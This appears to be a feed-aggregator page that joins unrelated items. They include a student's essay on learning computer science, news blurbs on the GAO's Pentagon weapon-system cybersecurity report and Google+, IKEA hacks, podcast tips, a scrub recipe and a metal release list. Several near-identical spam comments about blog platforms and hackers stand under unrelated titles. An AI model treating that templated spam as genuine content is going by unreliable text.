          Learning how to learn: CS Edition      Cache   Translate Page      

I never thought I would be a Software Engineer, back when I was little I used to have the firm conviction to be an Architect, but something happened... I realized that the more I grew up the more I became more interested in Computers. After my third semester of High School (I live in México, and in my state, public High School lasts 4 semesters) I came with an answer: I was decided to do a BS in Computer Science.

Lets go forward 4 months after I started university. It was the end of my first semester in school (2015, 3 years ago), just 4 months of experience coding, my first programming class was object oriented programming and the deadline of my first final project in my CS degree was 1 week away.

An ERP system to manage the students, professors, classes and schedules of a university using a MySql Database.

I wanted to cry. Like, literally. It was my first project in my CS career and I was stuck. What is a database? What is SQL? What is a non-relational database? What is a database management system? How can I connect my Java code to a database? I used to have a lot of questions like those, I had no experience and I had no idea in how to do those things.

Of course that I could have just copied code from stack overflow or pages like that, but I NEEDED to know how things work. For me, copying is just not enough. I was trying to finish the project, doing all from scratch and by my own.

I remember those nights of searching online in a lot of videos, web pages, books, everything... just to bring to my head new questions. I was totally lost. Searching the web was just doing harm to myself, Computer Science is an ocean of information and I was in the middle of that ocean with no clue of where I was, what to do or what information to search.

Our team finished the project with help of other students from higher semesters.

I still remember the feeling. The sensation that you know nothing, that even if you put all your effort in searching information, you don't understand anything, everything seems to be written in a foreign language (Actually it was, everything was in English, but you understand the point).

Even 6 months later, after a C programming class, searching how to do web programming was like... wait what the hell is a framework and why do people recommend tons of them? What is Django? Backend? Frontend? What is the difference between a framework and a library? Maybe I was too slow, but that was a lot of information for me.

So I don't know if it was just me or everyone feels this way at the beginning, but I was very lost, I had the wish to learn more, but trying that just left me with more questions.

Do I still feel the same?

No. Absolutely no. I think that at some point of my degree I learned how to learn. This is a very import skill, because as a Software Engineer, you need to be updated with new technologies and you need to have the ability to learn new tech and tools as you walk through your career.

Maybe, eventually, everyone gets to this point. The point where you can surely read any documentation online and pick a new language. The point where you can read about new tech without being completely lost. The point where you can learn whatever you want online, just with a little patience.

But maybe not, maybe some people gets so frustrated that decides to quit CS, maybe some people will convince themselves thinking: "This is not for me". If you are getting to that point of frustration let me tell you something, you are not alone, everyone in the developers community is here to help you.

Do Not Give Up.

The next tips are for you. I want to give you some of my little experience as a CS Student in how to start diving in this beautiful ocean of knowledge. Keep in mind that this tips were the little things that helped me out to be a better learner, this tips may not be useful for your situation because we are all different.

Ask for help

Maybe it sounds obvious, but it is not. Sometimes our pride doesn't let us to ask for help, even tho it is a normal and healthy thing to do.

Don't expect someone giving you all the answers. Ask for advice, ask for experiences, try to understand how they learned what they know, try to figure out what do you need to start to study to get to the level where they are. Ask for advice to know how you will start tackling all the information that is out there.

Be Social

Going to Campus Party México (A tech convention full of conferences) has been one of the best experiences of my life. I spent 8 hours traveling in a bus with a bunch of strangers across the country just to meet new people and to learn all that I could about technology.

Talking to all the devs, the hackers, the creative people and even the business people, all of that helped me to grow in an incredible way.

Having conversations with people that have more experience than you is like reading a good book. It's amazing. You get to know experiences that will help you through you journey, knowing what is going to come and how they affronted those situations is a great opportunity for you to think about how you could react to similar situations. You start to discover a lot of things that you were unaware of.

Math is fun

Not everybody thinks this way but I do.

Having a good background in math is very helpful for every programmer. Probably in you daily work you will not use derivatives and integrals BUT algebra, calculus, probability and geometry will give you an excellent sense of logic.

I am not saying that you have to be good at math to be a good dev. My point is that, in my case, I can see a relation between having more ability with math and having more understanding in how a computer works and more ease writing code.

Read Read and Read

Reading is fundamental for your development. Articles like the ones that you can find here or in any development site are very helpful.

Be a proactive student, don't be satisfied with the information that you get in the school, in the bootcamp or in the online-course.

You need to be hungry of information. Time is not an excuse, I read "Clean Code" by Robert C. Martin between my Uni classes even tho I work halftime as a Web Dev.

If I can do it, you surely can.

Make CS an important part of your life

After a few months into my degree I realized that making CS a constant topic in my life, and I am not including here my "Academic Life", was a great way to learn about short topics in a fun and fast way.

When I say "Make CS an important part of my life" I am referring to little things like, following YouTube channels about CS, following devs in Twitter, going to conferences about tech, making CS a topic of conversation with other devs/classmates instead of talking about the last-night episode of -insert favorite show- and even talking with my Uni professors about their experience in the tech industry.

I am not saying that you should leave all your hobbies to live a 100% software engineering life. I am saying that you should consider CS as another hobbie in your life.

It's okey if this is too much CS for you, some people prefer to think about this things only in their work time. But, if you are like me and you absolutely LOVE coding and learning new things about tech everyday, you should consider this advice.

Do not stress out

This point is very important. Always keep calm.

NO ONE knows everything, so keep calm. It is okey if you don't understand some topic, it is okey if you don't understand some tech and it is okey if you just don't 'feel' to learn it.

I used to stress out a lot because my skills in web development (specially front-end) are not the best out there, but after some time thinking about what I really want in my life I realized that web development Its just not my thing.

So, after all, there was no point in getting stressed because I didn't know the latest JavaScript framework or because I didn't know how to do good front end design if at the end of the day I was going to pursue the low level programming and algorithms path.

Those were some aspects of my life as student that helped me to learn more and faster. Maybe those points do not apply for you, but I feel the need to bring new ideas to the discussion, because after all, communities like this one helped me in my introduction to this industry.

Sometimes you can feel down, sometimes you can feel that your productivity levels are really low and that you are not learning anything, but let me say to you this: Eventually, everything gets better, just keep going, keep learning, keep putting effort in what you want.

"Everything in this life has a fix, except death" So enjoy your life learning what you love.

Thank you for reading ~


          minecraft free download 2018 より 差込型コネクターとリングスリーブによる電線の結線 へのコメント      Cache   Translate Page      
Hey there! I know this is somewhat off topic but I was wondering which blog platform are you using for this website? I'm getting fed up of Wordpress because I've had problems with hackers and I'm looking at options for another platform. I would be fantastic if you could point me in the direction of a good platform.
          WhatsApp fixes bug that let hackers take over app when answering a video call      Cache   Translate Page      
Bug only affects WhatsApp for Android and iOS, but the issue has been fixed this week.
          Pentagon slow to protect weapon systems from cyber threats - U.S. agency      Cache   Translate Page      
The Pentagon has been slow to protect major weapon systems from cyber attacks and routinely found critical vulnerabilities that hackers could potentially exploit in those systems, a federal government report said on Tuesday.

          Sunsetting Google Plus      Cache   Translate Page      
Ben Smith (Hacker News): The review did highlight the significant challenges in creating and maintaining a successful Google+ that meets consumers’ expectations. Given these challenges and the very low usage of the consumer version of Google+, we decided to sunset the consumer version of Google+. To give people a full opportunity to transition, we will […]
          Headboard with lights feat. LINNMON table top      Cache   Translate Page      

Here is my latest hack: A headboard with lights (backlit) made out of an IKEA LINNMON table top. The wall behind my bed was starting to turn dirty and wanted a nice cheap headboard to match the rest of the bedroom deco. Materials: 1 x 150cm LINNMON table top, I chose white as it felt […]

The post Headboard with lights feat. LINNMON table top appeared first on IKEA Hackers.


          HEKTAR wall lamp in Wood and Steel      Cache   Translate Page      

When decorating the living room in our new house, my wife and I searched for a wood/steel combination wall lamp. We did not find an exactly what we wanted, or we declared it as was way too expensive, but the HEKTAR design from IKEA did have the shade form we liked. So I decided to […]

The post HEKTAR wall lamp in Wood and Steel appeared first on IKEA Hackers.


          Comentario en Cuanto mide Ruben Cortada por cheap divorce      Cache   Translate Page      
Hi there! I know this is kinda off topic but I was wondering which blog platform are you using for this website? I'm getting fed up of Wordpress because I've had problems with hackers and I'm looking at alternatives for another platform. I would be great if you could point me in the direction of a good platform.
          Comment on DSC_1320 by vinyl gate      Cache   Translate Page      
Hello! I just wanted to ask if you ever have any issues with hackers? My last blog (wordpress) was hacked and I ended up losing months of hard work due to no backup. Do you have any solutions to stop hackers?
          What Drives Tech Internet Giants To Hide Data Breaches Like The Google+ Breach - Forbes      Cache   Translate Page      

Forbes

What Drives Tech Internet Giants To Hide Data Breaches Like The Google+ Breach
Forbes
Google held their Pixel 3 Hardware event in New York City on October 9, 2018, and unveiled their newest and anticipated phone, the Pixel 3 Smartphone and a few other hardware devices Home Hub, a smart display; and the Pixel Slate. But on the heels of ...
Google's Home Hub is Missing a Camera. Here's Why That's a Smart IdeaTIME
Google takes on the iPad Pro and Surface Pro with the Pixel SlateMashable
The 5 Most Important Announcements from Google's Pixel EventLifehacker
YouTube
all 3,186 news articles »

          Cyber Tests Showed 'Nearly All' New Pentagon Weapons Vulnerable To Attack, GAO Says - NPR      Cache   Translate Page      

NPR

Cyber Tests Showed 'Nearly All' New Pentagon Weapons Vulnerable To Attack, GAO Says
NPR
Passwords that took seconds to guess, or were never changed from their factory settings. Cyber vulnerabilities that were known, but never fixed. Those are two common problems plaguing some of the Department of Defense's newest weapons systems, ...
Watchdog: 'Nearly all' new US weapons systems vulnerable to cyber attacksCNN
An alarming report shows hackers can break into US weapons systems in less than an hourBusiness Insider
Weapon Systems Cybersecurity:Government Accountability Office

all 309 news articles »

          El fallo de seguridad de Google+ que no interesó ni a los hackers      Cache   Translate Page      
Este es el fallo de seguridad que ha puesto en jaque a Google+ y que ha terminado desencadenando un cierre inevitable.
          HPR2658: Questions on podcast production      Cache   Translate Page      

HPR Chat with Al

Al asks Dave a number of questions about podcast audio recording and post-production.

Al is thinking of doing National Podcast Post Month in November

National Podcast Post Month (or NaPodPoMo) is a challenge in a similar vein to National Novel Writing Month (or NaNoWriMo) in which participants are challenged to produce and publish a piece of audio as a podcast, every day for the month of November.

Bad podcast audio

Audio quality is as important as the content that's being presented. Bad audio is going to be what causes new podcasters the most damage in subscriber numbers. An example of good audio is the true crime podcast, One Eye Open, which Dave started listening to a couple of weeks ago. He also picked up a couple of other true crime podcasts as a result of listening to One Eye Open where the audio quality is so bad, that they can't be heard!

Loudness is a measurement of how loud something is perceived to be. Levelling is a process of ensuring that individual tracks in a podcasts are an an equivalent level, but also the podcast overall is at an equivalent level to other podcasts that have been levelled the same way.

Our setups

Al and Dave have a very similar microphone setup.

  • Samson Q2U - XLR and USB capable microphone
  • Pop filters and wind screens
  • Boom arm
  • Shock mount

What is a compressor

The non-technical definition is that it brings up the quiet bits and brings down the louder bits so that your voice has less of a variance if you shout or whisper.

Different microphone types

  • Cardioid - focuses on sounds coming from in front of the mic
  • Omnidirectional - can theoretically pick up sound from all directions
  • Dynamic - well suited for vocal use
  • Condenser - overall better quality sound than dynamic, but more susceptible to background noise, so requires a really quiet studio environment

Your level

You can measure your own level in Audacity - make sure you stay in the green! If you stray into yellow or even red, either lower your level or move slightly away from the mic.

Other people's levels

Concentrate on your own, get others to manage theirs. If you're recording multiple tracks, it can be managed in post-production, but once it's been merged into a single track it's virtually impossible.

File formats

Record in a lossless format, and do your edits and post-production in a lossless format. Only transcode to a lossy format once you're ready to publish your final file.

Monitoring

If you're recording yourself, and you don't want to hear yourself through headphones, take the headphones off.

If you're recording with someone else who is not in the same room, you are better off hearing yourself through your headphones at the same level as the person you're talking to.

Post-production

  • Use Audacity to:
    • align the tracks so that everyone is in the right place
    • convert coughs, sneezes, burps, keyboard sounds, mouse clicks, etc to silence
  • Use Auphonic to:
    • level the individual tracks so that everyone sounds as "loud" as anyone else
    • merge the individual tracks into a single output file (a Multitrack production)
  • Dave also gives a specific use case for adding music into the final mix.

NaPodPoMo revisited

This will be Al's first attempt at NaPodPoMo, but not for Dave. Dave wants to make sure that he plans for this year, so he doesn't run out of material on day 7!!

Dave will interview another NaPodPoMo participant at least once a week during November. Looks like Al will be one of them!

Dave's final thought

Podcasting isn't rocket science. You don't need lots of expensive equipment to produce a podcast. You just need something to record into (e.g. a mobile phone or portable recorder) and somewhere to host it. You can host on your own website or on one of a number of free services, like Anchor, AudioBoom, or indeed Hacker Public Radio!

The obligatory podcast plug

Errata

  • Dave originally said that the pickup pattern that picks up 360 degrees was "unidirectional" - it should have been "omnidirectional" and has been fixed in the edit, but it sounds like it was added in afterwards... which, of course, it was!!

          Ceslava2009: РЕЦЕПТ ЭТОГО СКРАБА ДОЛЖНА ЗНАТЬ КАЖДАЯ ЖЕНЩИНА!      Cache   Translate Page      

Это цитата сообщения БЕЛОЯР_2 Оригинальное сообщениеРЕЦЕПТ ЭТОГО СКРАБА ДОЛЖНА ЗНАТЬ КАЖДАЯ ЖЕНЩИНА!

Желательно его использовать после бани или сауны, но можно и в домашних условиях, после ванны или тёплого душа.

Ингредиенты:

♦ 1/2 стакана сахара
♦ 1/2 стакана морской соли
♦ 1/2 стакана оливкового масла «Extra virgin»
♦ 1/2 стакана меда
эфирные масла
(иланг-иланг, пальмароза, апельсиновое, ромашковое, в общей сложности 30 капель)
♦ 1 столовая ложка масла ши
♦ 1 столовая ложка масла какао
♦ 25 гр. корицы
♦ 25 гр. сухого имбиря
♦ 25 гр. какао-порошка

Смешать морскую соль и сахар, добавить оливковое масло и ваши любимые эфирные масла. Их должно быть не более 30 капель в общей сложности.

На водяной бане растопить мед, в него, постепенно помешивая деревянной ложечкой, добавить сухие ингредиенты — имбирь, какао, корицу. Когда мед полностью расплавится, немного остудить и перелить получившуюся смесь к соли, сахару и оливковому маслу.

Можно хранить скраб «Лакшми» в чистой баночке. Для одного раза достаточно всего пары ложек.

Желательно его использовать после бани или сауны, но можно и в домашних условиях, после ванны или теплого душа. Скраб наносят на все тело массажными движениями, а затем смывают тёплой водой без мыла. Он отлично смывается, а после его применения кожа становится увлажненной, мягкой и приятно пахнущей.

Эффект длится около недели, так что каждый день применять этот скраб совсем не нужно.

по материалам сайта: «НАРОДНАЯ МЕДИЦИНА»


          to consider 2018 "the BIG list" (no replies)      Cache   Translate Page      
New adds: John Diva & The Rockets Of Love (feb 2019), Billybio (nov)

In bold, the last updates.


OCT 2018
Anthrax: State Of Euphoria 30th-anniversary 5.10 Island Records
Axxis: Monster hero 5.10 Phonotraxx
Coheed And Cambria: The unheavenly creatures 5.10 Roadrunner Records
Dee Snider: Sick Mutha F**kers - Live in the USA 5.10 earMUSIC
Hank Erix (Houston): Nothing but trouble 5.10 Cargo Records
High On Fire: Electric messiah 5.10 eOne
Leah: The quest 5.10 Inner Wound Recordings
Matt Nathanson: Sings his sad heart 5.10 Acrobat
Monuments: Phronesis 5.10 Century Media
Poets of the Fall: Ultraviolet 5.10 Insomniac
Steve Perry: Traces 5.10 Concord Records
Vola: Applause of a distant crowd 5.10 Mascot
Atreyu: In our wake 12.10 Spinefarm Records
Black Tiger: Black Tiger 12.10 Tanzan Music
City Of Thieves: Beast reality 12.10 Frontiers Records
Creye: Creye 12.10 Frontiers Records
Darkness: First class violence 12.10 Massacre Records
Dave Davies: Decade 12.10 Red River Entertainment
Evanescence: Synthesis Live 12.10 Eagle
Gama Bomb: Speed between the lines 12.10 AFM Records
God´s Army: Demoncracy 12.10 Rock Of Angels Records
Impellitteri: The nature of the beast 12.10 Frontiers Records
Kadavar: Live in Copenhagen 12.10 Nuclear Blast
London: Call that girl 12.10
Nazareth: Tattooed on my brain 12.10 Frontiers Records
RebelHot: Uncomfortableness 12.10 Metalapolis Records
Rose Tattoo: Scarred For Live (5cd box) 12.10
Seventh Wonder: Tiara 12.10 Frontiers Records
Smash Into Pieces: Evolver 12.10 Gain/ Sony Music
Terrorizer: Caustic attack 12.10 The End Records
Verni: Barricade 12.10 Mighty Music
Heir Apparent: The view from below 15.10 No Remorse Records
Ace Frehley: Spaceman 19.10 eOne/SPV
Aldo Nova: 2 19.10
Amaranthe: Helix 19.10 Spinefarm Records
Arion: Life is not beautiful 19.10 AFM Records
Bonfire: Legends 19.10
Disturbed: Evolution 19.10
Firmo: Rehab 19.10 Street Symphonies Records
Gorod: Aethra 19.10 Overpowered Records
Greta Van Fleet: Anthem of the peaceful army 19.10 Lava/Republic Records
Hearts Of Fire: Call of destiny 19.10 MelodicRock Records
Internal Bleeding: Corrupting influence 19.10 Unique Leader Records
Kiss: The Solo Albums - 40th Anniversary Collection 19.10 Casablanca/UME
Marty Friedman: One bad M.F. Live!! 19.10 Prosthetic Records
Medina Azahara: Trece rosas 19.10 Senador Music
Midnite City: There goes the neighbourhood 19.10 AOR Heaven
Nothing But Thieves: What did you think when you made me this way EP 19.10 RCA
Roulette: Now! 19.10
Saliva: 10 Lives 19.10 Megaforce Records
Saxon: The eagle has landed 19.10 BMG
Soulfly: Ritual 19.10 Nuclear Blast
Spectra (Kenny Leckremo): Spectra 19.10
Whitesnake: Unzipped cd-box 19.10
Bloodbath: The arrow of Satan is drawn 26.10 Peaceville Records
C.T.P: Point Blank 26.9
Chevelle: 12 Bloody spies 26.10 Epic Records
Fifth Angel: The third secret 26.10 Nuclear Blast
Gary Moore Tribute: Moore Blues for Gary 26.10
Haken - Vector 26.10 Inside Out Records
Hamlet: Berlin 26.10
Hate Eternal: Upon desolate sands 26.10 Season Of Mist
Heaven's Trail: Lethal mind 26.10 Escape Records
Icarus Witch: Goodbye cruel world 26.10 Cleopatra Records
The Kinks: The Kinks are the village green preservation society 50th-anniversary 26.10 BMG Records
Nothgard: Malady X 26.10 Metal Blade Records
Picture: Live 40 years Heavy Metal ears 78-18 26.10 Pure Steel Records
Sirenia: Arcane astral aeons 26.10 Napalm Records
Striker: Play to win 26.10 Record Breaking Records
Unleashed: The hunt for white Christ 26.10 Napalm Records
Warrel Dane: Shadow work 26.10 Century Media Records
Westfield Massacre: Salvation 26.10 Nerve Strike Records
White Widdow: Victory 26.10 AOR Heaven Records
Perfect View: Timeless 29.10 Lions Pride Music
Tourniquet: Gazing at Medusa Pathogenic Records

NOV 2018
Arsis: Visitant 2.11 Nuclear Blast Records
Audiotopsy: The real now 2.11 Megaforce Records
Cancer: Shadow gripped 2.11 Peaceville Records
Eden´s Curse: Testament, the best 2.11 AFM Records
Hank Von Hell: Egomania 2.11 Sony Music
The Heard: The island 2.11 Despotz Records
Metallica: …And Justice For All 2.11 Blackened Records
The Neal Morse Band: Morsefest! 2017 2.11
Opeth: Garden of the titans: Live at Red Rocks Amphitheatre 2.11 Nuclear Blast
Roadkill: Ruled by machines 2.11 MelodicRock Records
Robert Rodrigo Band: Living for louder 2.11
Sick Of It All: Wake the sleeping dragon! 2.11 Century Media Records
Steven Wilson: Home invasion: In concert at The Royal Albert Hall 2.11 Caroline International
Witherfall: A prelude to sorrow 2.11 Century Media Records
All That Remains: Victim of the new disease 9.11 Razor & Tie Records
Architects: Holy hell 9.11 Epitaph Records
Burning Witches: Hexenhammer 9.11 Nuclear Blast records
Evoken: Hypnagogia 9.11 Profound Lore Records
Flotsam And Jetsam: The end of chaos 9.11 AFM Records
Holter: Vlad the impaler 9.11 Frontiers Records
Jimi Hendrix: Electric ladyland 50TH An. 9.11 Legacy Recordings
Lacuna Coil: The 119 Show - Live in London 9.11
Lucifer's Child: The order 9.11 Agonia Records
Nordic Union: Second coming 9.11 Frontiers Records
Phenomena: I, II, III 9.11 Cherry Red Records
Radiant: Radiant 9.11
Red Dragon Cartel: Patina 9.11Frontiers Records
Reece: Resilient heart 9.11 Mighty Music
Stephen Pearcy: View to a thrill 9.11 Frontiers Records
Ted Nugent: The music made me do it 9.11
Ten: Illuminati 9.11 Frontiers Records
Muse: Simulation theory 12.11 Warner Bros Records
Afire: On the road from nowhere 16.11 Concorde Music Company
Amon Amarth: The pursuit of Vikings: 25 years in the eye of the storm 16.11 Metal Blade Records
Artillery: The face of fear 16.11 Metal Blade Records
Chris Cornell: Restrospective box 16.11 UMG Recordings
Memphis May Fire: Broken 16.11 Rise Records
Nita Strauss: Controlled chaos 16.11 Sumerian Records
P.O.D: Circles 16.11 Mascot Label Group
Rush: Hemispheres 40Th anniv 16.11 UMe/Anthem/ole
Smashing Pumpkins: Shiny and oh so bright, Vol. 1 / LP: No past. No future. No sun 16.11 Napalm Records
Accept: Symphonic Terror - Live At Wacken 2017 23.11 Nuclear Blast
Brett Walker: Last parade 6CD Box Set 23.11 MelodicRock Records
Care Of Night: Love equals war 23.11 AOR Heaven Records
Cattle Decapitation: Medium rarities 23.11 Metal Blade Records
Dan Reed Network: Origins 23.11 Zero One Entertainment
Electric Boys: The ghost ward diaries 23.11 MIGHTY Music
Jean Beauvoir: Rock Masterpieces Vol.2 23.11 AOR Heaven
Sodom: Partisan EP 23.11 SPV/Steamhammer
Vandenberg's MoonKings: Rugged and unplugged 23.11 Mascot Records
Virgin Steele: Seven Devils Moonshine - 35th anniv. 23.11 SPV/Steamhammer
Master: Vindictive miscreant 28.11 Transcending Obscurity Records
Billybio: Feed the fire 30.11 AFM Records
Chrome Division: One last ride 30.11 Nuclear Blast Records
Hush: If you smile 30.11 Lions Pride Music
Donnie Vie: Beautiful things
Jerome Mazza: solo album Escape Music

DEC 2018
Alcatrazz: Parole denied - Tokyo 2017 7.12 Frontiers Records
Buckets Rebel Heart: 20 Good summers 7.12 Pride & Joy Music
Devil's Hand: 7.12 Frontiers Records
Gotthard: Defrosted II 7.12 Nuclear Blast Records
Johnny Gioeli: One Voice 7.12 Frontiers Records
Magic Dance: New eyes 7.12 Frontiers Records
Metal Church: Damned if you do 7.12 Rat Pak Records
Palace: Binary music 7.12 Frontiers Records
State Of Salazar: Superhero 7.12 Frontiers Records
Steelheart: Rock'N Milan 7.12 Frontiers Records
Dark Moor: Origins 12.12 King Records
Within Temptation: resist 14.12 Spinefarm Records
Sinestress: Fear Art Of Melody Music
Terra Nova: Raise your voice

2018
220 Volt
38 Special:
91 Suite: new album
Abysmal Dawn: new album Season Of Mist Records
Adriangale: MelodicRock Records
Alissa (White-Gluz): solo album Napalm Records
Allen/Lande:
Angelus Apatrida: Hidden Livevolution
Animal Drive: Frontiers Records
Art Nation:
Atheist: new album Agonia Records
Axe: The last offering Escape Music
Baby Snakes:
Bad Brains: new album
Beggars & Thieves: live album
Beggars & Thieves: new album
Benediction:
Biffy Clyro: Balance, not symmetry
Block Buster:
Brainstorm:
Brian Howe:
Brigade
The Brink: Frontiers Records
Bruce Dickinson:
Bryan Cole: Desire Kivel Records
Burning Rain: new album Frontiers Records
Carcass:
Catalano:
Cheap Trick
Circus Maximus
Coastland Ride:
Come Taste The Band: new album AOR Heaven
Coroner:
The Crown: new album Metal Blade Records
Cruzh:
Crystal Ball: new album
The Damned: new album Search & Destroy Records
D.A.D:
Dalton:
Dare: new album
Dare: Best of
Dark Angel:
Darkhorse:
The Darren Phillips Project:
Dave Bickler: Darklight
Death Dealer:
Dead Of Night: Pride & Joy Music
Diamond Head:
Dino Cazares: solo album
DIO Disciples: debut album BMG
East Temple Avenue
Entombed A.D:
Fahran: Vapours
Gathering Of Kings:
Göran Edman:
Gypsy Rose: new album
Hackers:
Hittman:
Hoobastank: new album Napalm Records
House Of Shakira:
Hurricane:
Incognito: s/t Kivel Records
Jack Russell’s Great White: Once acoustically bitten
JaR:
Jesse Damon
Jonathan Davis
John Sykes: Sy-Ops
Jordan Rudess: new album Mascot Records
Jorn: new album Frontiers Records
Jorn: Box Set
Jungle Rot: new album Victory Records
Kane Roberts: new album Frontiers Records
Killer Bee:
Lagoon:
Lillian Axe: From Womb To Tomb
Lita Ford:
Mad Invasion:
Magnum: Live album
Mason Hill: Frontiers Records
Mats Karlsson
Mick Mars: solo album
Michael Monroe:
Michael Thompson Band:
MisterMiss:
Mother Road:
MPG "Martie Peters Group": Unfinished business
Nile:
Nils Patrik Johansson: Evil Deluxe MetalVille Records
Nitro:
Obús: new album
The Offspring: new album
On The Rise:
One Desire:
The Order:
Outlasted: new album MelodicRock Records
Pete Way: solo album
Player:
Pleasure Maker: Dancin' with danger Lions Pride Music
Pretty Maids: live-dvd/cd Frontiers Records
Rachel Lorin: new album Frontiers Records
Raspberry Park: new album AOR Heaven Records
Razor:
Reckless Love
Rival Sons: new album Low Country Sound/Atlantic
Romeo's Daughter:
The Ron Keel Band:
Royal Flush
Royal Mess
Saint Deamond
Santa Ana Winds: Inherit the wind AOR Blvd Records
Sebastian Bach:
Silent:
Skeletonwitch:
Spirits Of Fire: Frontiers Records
Starz:
State Cows: Challenges
State Of Rock: new album AOR Heaven
Steve Overland:
The Swedish Funk Connection:
Tango Down: new album Kivel Records
Tempt:
Tom Keifer:
Tony Martin: Thornz
Toseland: new album Frontiers Records
Venom:
Viana:
Vimic: Open your omen Universal Music Enterprises
Violet Janine:
Warlord: new album Frontiers Records
Waysted:
Work of Art
X Japan:
XYZ: new album

2019
7HY: new album Lions Pride Music
Alan Parsons: new album Frontiers Records
Anthrax:
Armored Saint: new album
Assassin: new album Massacre Records
Avenged Sevenfold:
Backyard Babies: Silver and gold Century Media
Battle Beast
Biff Byford: School of hard knocks
Black Star Riders: new album
Brother Firetribe: new album
Buckcherry: Warpaint
Bush:
Danko Jones: new album AFM Records
Danny Vaughn: solo album
Def Leppard:
Delain: new album
Demons & Wizards
Dokken:
Down 'N' Outz
The End:
Exciter:
Exodus:
Extreme:
Fair Warning: new album
Faithsedge:
Find Me: new album
Fit For An Autopsy: album debut Nuclear Blast
Fortune: comeback album Frontiers Records
Hammerfall:
Helix:
Helloween: live album Nuclear Blast
Jim Peterik´s World Stage: Winds of change
Killer Dwarfs: new album EMP Label Group
Killswitch Engage: New album Metal Blade Records
King Of Hearts: new album
King's X: new album Golden Robot Records
Korn:
Kreator:
Last In Line:
Leverage: new album Frontiers Records
The Magpie Salute: High water II Mascot/Eagle Rock
Malevolent Creation: The 13th beast Century Media
Megadeth:
Mike Tramp: new album Target Records
Neal Morse Project: Jesus Christ - The Exorcist Frontiers Records
Overkill:
Papa Roach:
Pearl Jam:
Pretty Maids: new album
Queensryche:
Rammstein:
Ratt:
Richie Sambora: solo album
Rob Zombie:
Room Experience: Another time and place
Roxy Blue: new album Frontiers Records
Running Wild:
Sabaton:
Sacred Reich: new album Metal Blade Records
Sadus:
Sascha Paeth:
Septicflesh: new album Nuclear Blast
Slipknot:
Soilwork: new album Nuclear Blast
Sons Of Apollo: new live dvd/BluRay
Spread Eagle: new album Frontiers Records
Stratovarius: new album
Symphony X:
Tarja Turunen: new album
Ted Poley: new album Frontiers Records
Terra Nova:
Thunder:
Tesla: Shock Frontiers Records
Tora Tora: new album Frontiers Records
The Treatment: new album Frontiers Records
Volbeat: new album
Waiting For Monday: debut album Frontiers Records
Whitesnake: Flesh & Blood

JAN 2019
Legion Of The Damned: Slaves of the shadow realm 4.1 Napalm Records
Bring Me The Horizon: Amo 11.1 Columbia Records
Carnal Forge: Gun to mouth salvation 25.1 ViciSolum Productions
Jetboy: Born to fly 25.1 Frontiers Records
Skunk Anansie: 25LIVE@25 25.1 Republic Of Music
Starbreaker: new album 25.1 Frontiers Records
The Circle: Space between
Evergrey: The Atlantic AFM Records

FEB 2019
Avantasia: Moonglow 1.2 Nuclear Blast
John Diva & The Rockets Of Love: Mama said Rock is dead 8.2 Steamhammer/SPV
Rock Goddess: This time 22.2 Bite You To Death Records
Dream Theater: new album
Fiction Syxx: The alternate me MelodicRock Records
Inglorious: new album Frontiers Records
Overkill: new album

MAR 2019
Children Of Bodom: new album
Venom INC: new album

APR 2019
Testament: new album

MAY 2019
Bai Bang: Best Of 4 Lions Pride Music

SEP 2019
Dragonforce: new album

2020
Helloween: new album Nuclear Blast
Nightwish: new album
          Pentagon slow to protect weapon systems from cyber threats: U.S. agency      Cache   Translate Page      
The Pentagon has been slow to protect major weapon systems from cyber attacks and routinely found critical vulnerabilities that hackers could potentially exploit in those systems, a federal government report said on Tuesday.

          400 of these are going to the Hackaday Superconference @hackaday @hackadayio #supercon @adafruit      Cache   Translate Page      
400 of these hackable Python powered devices are going to the Hackaday Superconference | Pasadena Nov 2-4 2018. Adafruit is sponsor. The Hackaday Superconference is the greatest gathering of hardware hackers, builders, engineers and enthusiasts in the world. Supercon 2018 is 3 full days! Join us November 2-4 (2018) in Pasadena, CA. The conference begins on […]
          Cyber Tests Showed 'Nearly All' New Pentagon Weapons Vulnerable To Attack, GAO Says       Cache   Translate Page      

Passwords that took seconds to guess, or were never changed from their factory settings. Cyber vulnerabilities that were known, but never fixed. Those are two common problems plaguing some of the Department of Defense's newest weapons systems, according to the Government Accountability Office.

The flaws are highlighted in a new GAO report, which found the Pentagon is "just beginning to grapple" with the scale of vulnerabilities in its weapons systems.

Drawing data from cybersecurity tests conducted on Department of Defense weapons systems from 2012 to 2017, the report says that by using "relatively simple tools and techniques, testers were able to take control of systems and largely operate undetected" because of basic security vulnerabilities.

The GAO says the problems were widespread: "DOD testers routinely found mission critical cyber vulnerabilities in nearly all weapon systems that were under development."

When weapons program officials were asked about the weaknesses, the GAO says, they "believed their systems were secure and discounted some test results as unrealistic."

The agency says the report stems from a request from the Senate Armed Services Committee, asking it to review the Pentagon's efforts to secure its weapons systems. The GAO did so by going over data from the Pentagon's own security tests of weapon systems that are under development. It also interviewed officials in charge of cybersecurity, analyzing how the systems are protected and how they respond to attacks.

The stakes are high. As the GAO notes, "DOD plans to spend about $1.66 trillion to develop its current portfolio of major weapon systems." That outlay also comes as the military has increased its use of computerized systems, automation and connectivity.

Despite the steadily growing importance of computers and networks, the GAO says, the Pentagon has only recently made it a priority to ensure the cybersecurity of its weapons systems. It's still determining how to achieve that goal — and at this point, the report states, "DOD does not know the full scale of its weapon system vulnerabilities."

Part of the reason for the ongoing uncertainty, the GAO says, is that the Defense Department's hacking and cyber tests have been "limited in scope and sophistication." While they posed as hackers, for instance, the testers did not have free rein to attack contractors' systems, nor did they have the time to spend months or years to focus on extracting data and gaining control over networks.

Still, the tests cited in the report found "widespread examples of weaknesses in each of the four security objectives that cybersecurity tests normally examine: protect, detect, respond, and recover."

From the GAO:

"One test report indicated that the test team was able to guess an administrator password in nine seconds. Multiple weapon systems used commercial or open source software, but did not change the default password when the software was installed, which allowed test teams to look up the password on the Internet and gain administrator privileges for that software. Multiple test teams reported using free, publicly available information or software downloaded from the Internet to avoid or defeat weapon system security controls."

In several instances, simply scanning the weapons' computer systems caused parts of them to shut down.

"One test had to be stopped due to safety concerns after the test team scanned the system," the GAO says. "This is a basic technique that most attackers would use and requires little knowledge or expertise."

When problems were identified, they were often left unresolved. The GAO cites a test report in which only one of 20 vulnerabilities that were previously found had been addressed. When asked why all of the problems had not been fixed, "program officials said they had identified a solution, but for some reason it had not been implemented. They attributed it to contractor error," the GAO says.

One issue facing the Pentagon, the GAO says, is the loss of key personnel who are lured by lucrative offers to work in the private sector after they've gained cybersecurity experience.

